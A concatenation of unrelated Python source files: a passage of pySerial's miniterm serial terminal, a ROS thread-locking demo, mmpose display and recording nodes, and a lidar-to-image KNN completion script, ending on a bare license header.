sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7': # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
            sys.stderr.write('--- unknown menu character {} ---\n'.format(key_description(c)))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g. to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
python_multithreading_example.py
|
#! /usr/bin/python
import threading
from threading import Thread, Lock
from std_msgs.msg import String
from time import sleep
import copy
import rospy
import random
# These will be initialized later
pub1 = None
pub2 = None
kill = False
# Create a lock that controls who has the ball
beach_lock = Lock()
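# Note: the explicit acquire()/release() pairs below could equivalently be
# written as "with beach_lock:" blocks, which also release on exceptions.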
""" Simple class that will be passed back and forth
between threads. For learning purposes only"""
class BeachBall:
def __init__(self):
self.hits = 1
self.court_side = "No one has the ball"
# Initialize the beach ball
ball = BeachBall()
# Function 1 will be run by thread1
def function1(args):
while not kill:
print("hello1 from thread1")
# Get the lock so thread2 does not steal the ball
beach_lock.acquire()
ball.court_side = "thread 1 has the ball"
# Deep copy the ball so that we can release the
# lock.
myball = copy.deepcopy(ball)
beach_lock.release() # let thread2 have the ball
# ONLY PUBLISH THE DEEP COPIED VALUE
pub1.publish(
String(myball.court_side))
# Force the threads to run at different rates
        # so that if someone removes the locks, the ball
# will get stolen
# (For demo purposes only)
sleep(random.randint(50, 200) / 100.0)
# Function2 will be called by thread2
def function2(args):
while not kill:
print("hello2 from thread2")
# Get the lock so thread1 does not steal the ball
beach_lock.acquire()
ball.court_side = "Thread 2 got the ball"
# Deep copy the ball so that we can release the
# lock.
myball = copy.deepcopy(ball)
beach_lock.release() # let thread1 get the ball
# ONLY PUBLISH THE DEEP COPIED VALUE
pub2.publish(
String(myball.court_side))
# Force the threads to run at different rates
        # so that if someone removes the locks, the ball
# will get stolen
# (For demo purposes only)
sleep(random.randint(50, 200) / 100.0)
if __name__ == "__main__":
print('Initializing')
rospy.init_node("threadripper")
# initialize the publishers PRIOR to running the
# threads
    # use 'rostopic echo /t1' to view thread1's output
    # use 'rostopic echo /t2' to view thread2's output
pub1 = rospy.Publisher("/t1", String, queue_size=2)
pub2 = rospy.Publisher("/t2", String, queue_size=2)
print('Launching threads')
    # Create the threads, pass in a useless argument
t1 = Thread(target=function1, args=(10,))
t2 = Thread(target=function2, args=(10,))
# Let the games begin!
t1.start()
t2.start()
# Wait for a CTRL-C or a roslaunch kill (IMPORTANT)
    while not rospy.is_shutdown():
        sleep(0.1)  # avoid a 100% CPU busy-wait
# Tell the threads to die
kill = True
# wait for the threads to terminate
t1.join()
t2.join()
    # hooray, we're done
print("Threads finished, done")
|
helper_node.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import logging
import time
from queue import Full, Queue
from threading import Thread
from typing import List, Optional, Union
import cv2
import numpy as np
from mmcv import color_val
from mmpose.utils.timer import RunningAverage
from .builder import NODES
from .node import Node
try:
import psutil
psutil_proc = psutil.Process()
except (ImportError, ModuleNotFoundError):
psutil_proc = None
@NODES.register_module()
class ModelResultBindingNode(Node):
def __init__(self, name: str, frame_buffer: str, result_buffer: str,
output_buffer: Union[str, List[str]]):
super().__init__(name=name, enable=True)
self.synchronous = None
# Cache the latest model result
self.last_result_msg = None
self.last_output_msg = None
# Inference speed analysis
self.frame_fps = RunningAverage(window=10)
self.frame_lag = RunningAverage(window=10)
self.result_fps = RunningAverage(window=10)
self.result_lag = RunningAverage(window=10)
# Register buffers
# Note that essential buffers will be set in set_runner() because
# it depends on the runner.synchronous attribute.
self.register_input_buffer(result_buffer, 'result', essential=False)
self.register_input_buffer(frame_buffer, 'frame', essential=False)
self.register_output_buffer(output_buffer)
def set_runner(self, runner):
super().set_runner(runner)
# Set synchronous according to the runner
if runner.synchronous:
self.synchronous = True
essential_input = 'result'
else:
self.synchronous = False
essential_input = 'frame'
# Set essential input buffer according to the synchronous setting
for buffer_info in self._input_buffers:
if buffer_info.input_name == essential_input:
buffer_info.essential = True
def process(self, input_msgs):
result_msg = input_msgs['result']
# Update last result
if result_msg is not None:
# Update result FPS
if self.last_result_msg is not None:
self.result_fps.update(
1.0 /
(result_msg.timestamp - self.last_result_msg.timestamp))
# Update inference latency
self.result_lag.update(time.time() - result_msg.timestamp)
# Update last inference result
self.last_result_msg = result_msg
if not self.synchronous:
# Asynchronous mode: Bind the latest result with the current frame.
frame_msg = input_msgs['frame']
self.frame_lag.update(time.time() - frame_msg.timestamp)
# Bind result to frame
if self.last_result_msg is not None:
frame_msg.set_full_results(
self.last_result_msg.get_full_results())
frame_msg.merge_route_info(
self.last_result_msg.get_route_info())
output_msg = frame_msg
else:
# Synchronous mode: Directly output the frame that the model result
# was obtained from.
self.frame_lag.update(time.time() - result_msg.timestamp)
output_msg = result_msg
# Update frame fps and lag
if self.last_output_msg is not None:
self.frame_lag.update(time.time() - output_msg.timestamp)
self.frame_fps.update(
1.0 / (output_msg.timestamp - self.last_output_msg.timestamp))
self.last_output_msg = output_msg
return output_msg
def _get_node_info(self):
info = super()._get_node_info()
info['result_fps'] = self.result_fps.average()
info['result_lag (ms)'] = self.result_lag.average() * 1000
info['frame_fps'] = self.frame_fps.average()
info['frame_lag (ms)'] = self.frame_lag.average() * 1000
return info
@NODES.register_module()
class MonitorNode(Node):
_default_ignore_items = ['timestamp']
def __init__(self,
name: str,
frame_buffer: str,
output_buffer: Union[str, List[str]],
enable_key: Optional[Union[str, int]] = None,
enable: bool = False,
x_offset=20,
y_offset=20,
y_delta=15,
text_color='black',
background_color=(255, 183, 0),
text_scale=0.4,
ignore_items: Optional[List[str]] = None):
super().__init__(name=name, enable_key=enable_key, enable=enable)
self.x_offset = x_offset
self.y_offset = y_offset
self.y_delta = y_delta
self.text_color = color_val(text_color)
self.background_color = color_val(background_color)
self.text_scale = text_scale
if ignore_items is None:
self.ignore_items = self._default_ignore_items
else:
self.ignore_items = ignore_items
self.register_input_buffer(frame_buffer, 'frame', essential=True)
self.register_output_buffer(output_buffer)
def process(self, input_msgs):
frame_msg = input_msgs['frame']
frame_msg.update_route_info(
node_name='System Info',
node_type='dummy',
info=self._get_system_info())
img = frame_msg.get_image()
route_info = frame_msg.get_route_info()
img = self._show_route_info(img, route_info)
frame_msg.set_image(img)
return frame_msg
def _get_system_info(self):
sys_info = {}
if psutil_proc is not None:
sys_info['CPU(%)'] = psutil_proc.cpu_percent()
sys_info['Memory(%)'] = psutil_proc.memory_percent()
return sys_info
def _show_route_info(self, img, route_info):
canvas = np.full(img.shape, self.background_color, dtype=img.dtype)
x = self.x_offset
y = self.y_offset
max_len = 0
def _put_line(line=''):
nonlocal y, max_len
cv2.putText(canvas, line, (x, y), cv2.FONT_HERSHEY_DUPLEX,
self.text_scale, self.text_color, 1)
y += self.y_delta
max_len = max(max_len, len(line))
for node_info in route_info:
title = f'{node_info["node"]}({node_info["node_type"]})'
_put_line(title)
for k, v in node_info['info'].items():
if k in self.ignore_items:
continue
if isinstance(v, float):
v = f'{v:.1f}'
_put_line(f' {k}: {v}')
x1 = max(0, self.x_offset)
x2 = min(img.shape[1], int(x + max_len * self.text_scale * 20))
y1 = max(0, self.y_offset - self.y_delta)
y2 = min(img.shape[0], y)
src1 = canvas[y1:y2, x1:x2]
src2 = img[y1:y2, x1:x2]
img[y1:y2, x1:x2] = cv2.addWeighted(src1, 0.5, src2, 0.5, 0)
return img
def bypass(self, input_msgs):
return input_msgs['frame']
@NODES.register_module()
class RecorderNode(Node):
"""Record the frames into a local file."""
def __init__(
self,
name: str,
frame_buffer: str,
output_buffer: Union[str, List[str]],
out_video_file: str,
out_video_fps: int = 30,
out_video_codec: str = 'mp4v',
buffer_size: int = 30,
):
super().__init__(name=name, enable_key=None, enable=True)
self.queue = Queue(maxsize=buffer_size)
self.out_video_file = out_video_file
self.out_video_fps = out_video_fps
self.out_video_codec = out_video_codec
self.vwriter = None
# Register buffers
self.register_input_buffer(frame_buffer, 'frame', essential=True)
self.register_output_buffer(output_buffer)
# Start a new thread to write frame
self.t_record = Thread(target=self._record, args=(), daemon=True)
self.t_record.start()
def process(self, input_msgs):
frame_msg = input_msgs['frame']
img = frame_msg.get_image() if frame_msg is not None else None
img_queued = False
while not img_queued:
try:
self.queue.put(img, timeout=1)
img_queued = True
logging.info(f'{self.name}: recorder received one frame!')
except Full:
                logging.info(f'{self.name}: recorder jammed!')
return frame_msg
def _record(self):
while True:
img = self.queue.get()
if img is None:
break
if self.vwriter is None:
fourcc = cv2.VideoWriter_fourcc(*self.out_video_codec)
fps = self.out_video_fps
frame_size = (img.shape[1], img.shape[0])
self.vwriter = cv2.VideoWriter(self.out_video_file, fourcc,
fps, frame_size)
assert self.vwriter.isOpened()
self.vwriter.write(img)
        if self.vwriter is not None:
            self.vwriter.release()
        logging.info('Video recorder released!')
def on_exit(self):
try:
            # Try putting a None into the frame queue so the self.vwriter will
# be released after all queue frames have been written to file.
self.queue.put(None, timeout=1)
self.t_record.join(timeout=1)
except Full:
pass
if self.t_record.is_alive():
# Force to release self.vwriter
logging.info('Video recorder forced release!')
if self.vwriter is not None:
self.vwriter.release()
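# A hedged usage sketch; the buffer names here are hypothetical, not taken
# from any mmpose config:
#   recorder = RecorderNode(name='recorder', frame_buffer='display',
#                           output_buffer='_display_',
#                           out_video_file='demo.mp4')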
|
complete_knn_train_28.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 10 19:57:23 2020
@author: kerui
"""
import sys
sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
# Fill each empty point in the projected cloud with the distance-weighted value of its three nearest valued points
import numpy as np
import cv2
import kdtree as KDT
import data_provider
#import config
import velo_2_cam
import os
import glob
#import ransac
import time
import multiprocessing
def generate_coor(x_min, x_max, y_min, y_max):
'''generate 2D coor'''
x = range(x_min, x_max)
y = range(y_min, y_max)
X, Y = np.meshgrid(x, y) # 2D grid
X, Y = X.flatten(), Y.flatten()
coordinate = [[x,y] for x, y in zip(X, Y)]
return (coordinate, x_min, x_max, y_min, y_max)
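# Illustrative (not from the original source):
#   generate_coor(0, 2, 0, 2)[0] == [[0, 0], [1, 0], [0, 1], [1, 1]]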
def complete_knn(data_dir, image_path, img_size, pc):
#print(pc[0].max(),pc[1].max())
start1 = time.perf_counter()
# create single_channel (gray) images as the blank maps
intensity_img_gray = np.zeros(img_size, dtype=np.uint8)
height_img_gray = np.zeros(img_size, dtype=np.uint8)
depth_img_gray = np.zeros(img_size, dtype=np.uint8)
# reshape lidar to img_size
    pc[0] = pc[0] * 512 / 1242 # rescale x from image width 1242 to map width 512
    pc[1] = pc[1] * 256 / 375 # rescale y from image height 375 to map height 256
#print(pc[0].max(),pc[1].max())
# locate the points on the maps
for i in range(np.size(pc, 1)):
(x,y) = (int(pc[1, i]), int(pc[0, i]))
if intensity_img_gray[x,y] == 0:
# intensity
intensity_img_gray[x,y] = int(pc[3, i]*255) # times 255 to normalize
# height
height_img_gray[x,y] = int((pc[2, i]+3)*85) # +3 to ensure positive; times 255/3=85 to normalize
# depth 3D
depth_img_gray[x,y] = int(pc[5, i]*3) # times 255/80->3 to normalize
# generate blocks to fill
kd_block = []
for patch in range(0,4):
x_0 = 256
x_1 = 200
x_2 = 140
x_3 = 0
y_min = patch * 128
y_max = y_min + 128
kd_block.append(generate_coor(x_min=x_1, x_max=x_0, y_min=y_min, y_max=y_max))
kd_block.append(generate_coor(x_min=x_2, x_max=x_1, y_min=y_min, y_max=y_max))
kd_block.append(generate_coor(x_min=x_3, x_max=x_2, y_min=y_min, y_max=y_max))
# build kd-tree
start2 = time.perf_counter()
kdtree_block = []
for block in kd_block:
coordinate, x_min, x_max, y_min, y_max = block
x_value = range(max(0,x_min-16), min(x_max+16,256))
y_value = range(max(y_min-16,0), min(y_max+16,512)) # bounding
X_value, Y_value = np.meshgrid(x_value, y_value) # 2D grid
X_value, Y_value = X_value.flatten(), Y_value.flatten()
# acquire the index of original lidar projection map
value_coordinate = [[x,y] for x, y in zip(X_value, Y_value) if intensity_img_gray[x,y] > 0]
if (len(value_coordinate)<10):
kdtree_block.append((None, None))
else:
kdtree = KDT.create(value_coordinate)
kdtree_block.append((value_coordinate, kdtree))
start3 = time.perf_counter()
# store the weight and coordinate of 3 nearest points in a dictionary
neighbor_dict = {}
for i in range(len(kd_block)):
#print('start querying %d block' %i)
coor = kd_block[i][0] # coordinate
value_coor, tree = kdtree_block[i] # value_coordinate, kdtree
        if value_coor is not None: # safety check
for x, y in coor:
# query existing points
if [x, y] in value_coor:
continue
else:
                    a1, b1, c1 = tree.search_knn([x, y], 3)
# query neighbor points
a = a1[0].data
b = b1[0].data
c = c1[0].data
# compute the distance
da = a1[1]
db = b1[1]
dc = c1[1]
                    # compute the weights (note: proportional to distance, so the farthest neighbor gets the largest weight)
d_s = da + db + dc
wa, wb, wc = da/d_s, db/d_s, dc/d_s
# add to neighbor_dict
neighbor_dict[(x, y)] = (a, b, c, wa, wb, wc)
start4 = time.perf_counter()
# pointcloud completion
for block in range(len(kd_block)):
#print('start filling %d block' %block)
if kdtree_block[block][0] is not None:
coor_ = kd_block[block]
for i, j in coor_[0]:
if(intensity_img_gray[i, j] == 0):
a, b, c, da_, db_, dc_ = neighbor_dict[(i,j)]
A = intensity_img_gray[tuple(a)]
B = intensity_img_gray[tuple(b)]
C = intensity_img_gray[tuple(c)]
intensity_img_gray[i,j] = da_*A + db_*B + dc_ *C # ABC are intensity on the 3 points
A = height_img_gray[tuple(a)]
B = height_img_gray[tuple(b)]
C = height_img_gray[tuple(c)]
height_img_gray[i,j] = da_*A + db_*B + dc_ *C # ABC are height on the 3 points
A = depth_img_gray[tuple(a)]
B = depth_img_gray[tuple(b)]
C = depth_img_gray[tuple(c)]
depth_img_gray[i,j] = da_*A + db_*B + dc_ *C # ABC are depth on the 3 points
start5 = time.perf_counter()
# generating merged data
merge = cv2.merge([intensity_img_gray, height_img_gray, depth_img_gray])
cv2.imwrite(data_dir+'velodyne_points/knn_results/'+image_path[-14:], merge)
elapsed = []
for i in [start1,start2,start3,start4,start5]:
elapsed.append(time.perf_counter() - i)
print("Time used:",elapsed)
def completion(data_dir, path_pc, path_image, path_calib):
'''the main function of completion'''
'''load the calib file'''
param = data_provider.read_calib(path_calib, [0,1,2,3])
cam2img = param[0].reshape([3,4]) # from camera-view to pixels
cam2cam = param[1].reshape([3,3]) # rectify camera-view
R = param[2].reshape([3,3])
T = param[3].reshape([3,-1])
vel2cam = np.append(R,T,axis=1) # from lidar-view to camera-view: [R;T] in raw_data
'''project and complete_knn'''
i = 0
total_num = len(path_image)
est_time = 0
for image_path, pc_path in zip(path_image, path_pc):
i+=1
start = time.perf_counter()
        print('-'*30, 'generating %d of %d' % (i, total_num), '-'*30)
# check the existing completed files
check_path = os.path.join(data_dir,'velodyne_points/knn_results/',image_path[-14:])
#print(check_path)
if os.path.exists(check_path):
print('pass file {}'.format(image_path))
total_num -= 1
continue
        # read the binary point-cloud file
lidar = data_provider.read_pc2array(pc_path,
height=[-2,-1], #[-1.75,-1.55]
font=True)
lidar = np.array(lidar)
#lidar = ransac.ransac(lidar)
image_name = image_path.split('\\')[-1]
img = cv2.imread(image_name)
img_shape = img.shape[:2] # (375,1242)
img_shape_inverse = (img_shape[1],img_shape[0])
cam_coor, pixel = velo_2_cam.lidar_to_camera_project(trans_mat=vel2cam,
rec_mat=cam2cam,
cam_mat=cam2img,
data=lidar,
pixel_range=img_shape_inverse
)
# pixel:=[x,y,h,r,d2,d3], x = 0-1242, y = 0-375
#print(pixel[2].max(),pixel[2].min(),pixel[3].max(),pixel[3].min(),pixel[4].max(),pixel[4].min())
print(image_name)
complete_knn(data_dir=data_dir, image_path=image_name, img_size=(256,512), pc=pixel)
        print('estimated time left: {:.1f} min'.format(
            (time.perf_counter()-start)*(total_num-i)/60))
#break
#print(pixel[3].min(),pixel[3].max())
def complete_func(data_dir, calib):
DIR1 = data_dir[0]
DIR2 = data_dir[1]
PATH_pc1 = sorted(glob.glob(os.path.join(DIR1, 'velodyne_points/data/*.bin')))
PATH_pc2 = sorted(glob.glob(os.path.join(DIR2, 'velodyne_points/data/*.bin')))
PATH_image1 = sorted(glob.glob(os.path.join(DIR1, 'image_02/data/*.png')))
PATH_image2 = sorted(glob.glob(os.path.join(DIR2, 'image_02/data/*.png')))
#completion(data_dir=data_dir, path_pc=PATH_pc, path_image=PATH_image, path_calib=calib)
# multi-processor should be less than cpu numbers
# process dataset1
p11 = multiprocessing.Process(target=completion, args=(DIR1,PATH_pc1[:215],PATH_image1[:215],calib))
p12 = multiprocessing.Process(target=completion, args=(DIR1,PATH_pc1[215:],PATH_image1[215:],calib))
# process dataset2
p21 = multiprocessing.Process(target=completion, args=(DIR2,PATH_pc2[:215],PATH_image2[:215],calib))
p22 = multiprocessing.Process(target=completion, args=(DIR2,PATH_pc2[215:],PATH_image2[215:],calib))
p11.start()
p12.start()
p21.start()
p22.start()
if __name__ == "__main__":
start = time.perf_counter()
data_dir1 = '2011_09_26_drive_0028_sync/'
data_dir2 = '2011_09_26_drive_0029_sync/'
calib_file = '2011_09_26/calib.txt' # use the same calib file for all data record at 2011_09_26
complete_func(data_dir=(data_dir1,data_dir2), calib=calib_file) # data_dir2
elapsed = (time.perf_counter() - start)
print("Time used:",elapsed)
|
syn_exercise.py
|
#!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
